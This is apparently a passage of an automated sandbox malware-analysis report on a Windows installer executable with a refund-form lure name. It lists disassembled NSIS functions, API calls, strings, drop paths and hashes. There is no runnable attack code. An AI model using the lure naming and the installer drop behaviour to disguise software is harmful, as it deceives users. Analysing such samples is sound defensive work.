                                                                                                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EE7
                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                                                                                      • Error launching installer, xrefs: 00402F2D
                                                                                                                                      • soft, xrefs: 00402FCB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                      • String ID: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                      • API String ID: 4283519449-759218292
                                                                                                                                      • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                      • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                                                                                      • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                      • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                                                                                                                      Function 004062DC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 436 4062dc-4062e7 437 4062e9-4062f8 436->437 438 4062fa-406310 436->438 437->438 439 406316-406323 438->439 440 406528-40652e 438->440 439->440 443 406329-406330 439->443 441 406534-40653f 440->441 442 406335-406342 440->442 444 406541-406545 call 4062ba 441->444 445 40654a-40654b 441->445 442->441 446 406348-406354 442->446 443->440 444->445 447 406515 446->447 448 40635a-406398 446->448 452 406523-406526 447->452 453 406517-406521 447->453 450 4064b8-4064bc 448->450 451 40639e-4063a9 448->451 456 4064be-4064c4 450->456 457 4064ef-4064f3 450->457 454 4063c2 451->454 455 4063ab-4063b0 451->455 452->440 453->440 461 4063c9-4063d0 454->461 455->454 458 4063b2-4063b5 455->458 459 4064d4-4064e0 call 4062ba 456->459 460 4064c6-4064d2 call 406201 456->460 462 406502-406513 lstrlenW 457->462 463 4064f5-4064fd call 4062dc 457->463 458->454 464 4063b7-4063ba 458->464 474 4064e5-4064eb 459->474 460->474 466 4063d2-4063d4 461->466 467 4063d5-4063d7 461->467 462->440 463->462 464->454 470 4063bc-4063c0 464->470 466->467 472 406412-406415 467->472 473 4063d9-406400 call 406188 467->473 470->461 475 406425-406428 472->475 476 406417-406423 GetSystemDirectoryW 472->476 486 4064a0-4064a3 473->486 487 406406-40640d call 4062dc 473->487 474->462 478 4064ed 474->478 480 406493-406495 475->480 481 40642a-406438 GetWindowsDirectoryW 475->481 479 406497-40649b 476->479 483 4064b0-4064b6 call 40654e 478->483 479->483 488 40649d 479->488 480->479 485 40643a-406444 480->485 481->480 483->462 491 406446-406449 485->491 492 40645e-406474 SHGetSpecialFolderLocation 485->492 486->483 489 4064a5-4064ab lstrcatW 486->489 487->479 488->486 489->483 491->492 494 40644b-406452 491->494 495 406476-40648d SHGetPathFromIDListW CoTaskMemFree 492->495 496 40648f 492->496 498 40645a-40645c 494->498 495->479 495->496 496->480 498->479 498->492
                                                                                                                                      APIs
                                                                                                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040641D
                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,00405359,Completed,00000000), ref: 00406430
                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405359,0041E411,00000000,Completed,?,00405359,Completed,00000000), ref: 0040646C
                                                                                                                                      • SHGetPathFromIDListW.SHELL32(0041E411,: Completed), ref: 0040647A
                                                                                                                                      • CoTaskMemFree.OLE32(0041E411), ref: 00406485
                                                                                                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405359,Completed,00000000), ref: 00406503
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                      • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                      • API String ID: 717251189-905382516
                                                                                                                                      • Opcode ID: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                                                                                                                      • Instruction ID: 9562dd14d952d55a61127842092d6448be61ccc4685f782e3002b21b8a961bfb
                                                                                                                                      • Opcode Fuzzy Hash: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                                                                                                                      • Instruction Fuzzy Hash: 38611171A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                                                                                                      Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 499 40176f-401794 call 402c41 call 405c06 504 401796-40179c call 4062ba 499->504 505 40179e-4017b0 call 4062ba call 405b8f lstrcatW 499->505 510 4017b5-4017b6 call 40654e 504->510 505->510 514 4017bb-4017bf 510->514 515 4017c1-4017cb call 4065fd 514->515 516 4017f2-4017f5 514->516 524 4017dd-4017ef 515->524 525 4017cd-4017db CompareFileTime 515->525 518 4017f7-4017f8 call 405d8b 516->518 519 4017fd-401819 call 405db0 516->519 518->519 526 40181b-40181e 519->526 527 40188d-4018b6 call 405322 call 403116 519->527 524->516 525->524 528 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 526->528 529 40186f-401879 call 405322 526->529 541 4018b8-4018bc 527->541 542 4018be-4018ca SetFileTime 527->542 528->514 561 401864-401865 528->561 539 401882-401888 529->539 543 402ace 539->543 541->542 545 4018d0-4018db CloseHandle 541->545 542->545 549 402ad0-402ad4 543->549 546 4018e1-4018e4 545->546 547 402ac5-402ac8 545->547 550 4018e6-4018f7 call 4062dc lstrcatW 546->550 551 4018f9-4018fc call 4062dc 546->551 547->543 557 401901-4022fc call 405920 550->557 551->557 557->547 557->549 561->539 563 401867-401868 561->563 563->529
                                                                                                                                      APIs
                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hovedprogrammers\*.pet,C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets,?,?,00000031), ref: 004017B0
                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hovedprogrammers\*.pet,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hovedprogrammers\*.pet,00000000,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hovedprogrammers\*.pet,C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets,?,?,00000031), ref: 004017D5
                                                                                                                                        • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Skolemoden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041E411,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041E411,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                        • Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041E411,771B23A0), ref: 0040537D
                                                                                                                                        • Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hovedprogrammers\*.pet$C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets$skoddenes\Uninstall\polypodiaceous\Excretive140
                                                                                                                                      • API String ID: 1941528284-2227989155
                                                                                                                                      • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                      • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                                                                                      • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                      • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                                                                                                                      Function 00405322 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 565 405322-405337 566 40533d-40534e 565->566 567 4053ee-4053f2 565->567 568 405350-405354 call 4062dc 566->568 569 405359-405365 lstrlenW 566->569 568->569 571 405382-405386 569->571 572 405367-405377 lstrlenW 569->572 574 405395-405399 571->574 575 405388-40538f SetWindowTextW 571->575 572->567 573 405379-40537d lstrcatW 572->573 573->571 576 40539b-4053dd SendMessageW * 3 574->576 577 4053df-4053e1 574->577 575->574 576->577 577->567 578 4053e3-4053e6 577->578 578->567
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(Completed,00000000,0041E411,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                      • lstrlenW.KERNEL32(0040327A,Completed,00000000,0041E411,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                      • lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041E411,771B23A0), ref: 0040537D
                                                                                                                                      • SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                      • String ID: Completed
                                                                                                                                      • API String ID: 2531174081-3087654605
                                                                                                                                      • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                      • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                                                                                      • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                      • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                                                                                      Function 00403116 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 579 403116-40312d 580 403136-40313f 579->580 581 40312f 579->581 582 403141 580->582 583 403148-40314d 580->583 581->580 582->583 584 40315d-40316a call 403331 583->584 585 40314f-403158 call 403347 583->585 589 403170-403174 584->589 590 40331f 584->590 585->584 591 4032ca-4032cc 589->591 592 40317a-4031c3 GetTickCount 589->592 593 403321-403322 590->593 594 40330c-40330f 591->594 595 4032ce-4032d1 591->595 596 403327 592->596 597 4031c9-4031d1 592->597 598 40332a-40332e 593->598 602 403311 594->602 603 403314-40331d call 403331 594->603 595->596 599 4032d3 595->599 596->598 600 4031d3 597->600 601 4031d6-4031e4 call 403331 597->601 604 4032d6-4032dc 599->604 600->601 601->590 613 4031ea-4031f3 601->613 602->603 603->590 611 403324 603->611 608 4032e0-4032ee call 403331 604->608 609 4032de 604->609 608->590 616 4032f0-4032fc call 405e62 608->616 609->608 611->596 615 4031f9-403219 call 4067f5 613->615 621 4032c2-4032c4 615->621 622 40321f-403232 GetTickCount 615->622 623 4032c6-4032c8 616->623 624 4032fe-403308 616->624 621->593 625 403234-40323c 622->625 626 40327d-40327f 622->626 623->593 624->604 629 40330a 624->629 630 403244-403275 MulDiv wsprintfW call 405322 625->630 631 40323e-403242 625->631 627 403281-403285 626->627 628 4032b6-4032ba 626->628 633 403287-40328e call 405e62 627->633 634 40329c-4032a7 627->634 628->597 635 4032c0 628->635 629->596 636 40327a 630->636 631->626 631->630 639 403293-403295 633->639 638 4032aa-4032ae 634->638 635->596 636->626 638->615 640 4032b4 638->640 639->623 641 403297-40329a 639->641 640->596 641->638
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                                      • String ID: ... %d%%$@
                                                                                                                                      • API String ID: 551687249-3859443358
                                                                                                                                      • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                      • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                                                                                      • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                      • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                                                                                                                      Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 642 406624-406644 GetSystemDirectoryW 643 406646 642->643 644 406648-40664a 642->644 643->644 645 40665b-40665d 644->645 646 40664c-406655 644->646 648 40665e-406691 wsprintfW LoadLibraryExW 645->648 646->645 647 406657-406659 646->647 647->648
                                                                                                                                      APIs
                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                      • wsprintfW.USER32 ref: 00406676
                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                      • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                      • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                                                                                                      Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 649 405ddf-405deb 650 405dec-405e20 GetTickCount GetTempFileNameW 649->650 651 405e22-405e24 650->651 652 405e2f-405e31 650->652 651->650 653 405e26 651->653 654 405e29-405e2c 652->654 653->654
                                                                                                                                      APIs
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",0040338D,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9), ref: 00405E18
                                                                                                                                      Strings
                                                                                                                                      • "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe", xrefs: 00405DDF
                                                                                                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                                                                                                                      • nsa, xrefs: 00405DEC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                      • String ID: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                                                      • API String ID: 1716503409-241318538
                                                                                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                      • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                      • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                                                                                      Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 655 4015c1-4015d5 call 402c41 call 405c3a 660 401631-401634 655->660 661 4015d7-4015ea call 405bbc 655->661 663 401663-402250 call 401423 660->663 664 401636-401655 call 401423 call 4062ba SetCurrentDirectoryW 660->664 668 401604-401607 call 40586e 661->668 669 4015ec-4015ef 661->669 677 402ac5-402ad4 663->677 678 40288b-402892 663->678 664->677 682 40165b-40165e 664->682 680 40160c-40160e 668->680 669->668 672 4015f1-4015f8 call 40588b 669->672 672->668 686 4015fa-401602 call 4057f1 672->686 678->677 683 401610-401615 680->683 684 401627-40162f 680->684 682->677 687 401624 683->687 688 401617-401622 GetFileAttributesW 683->688 684->660 684->661 686->680 687->684 688->684 688->687
                                                                                                                                      APIs
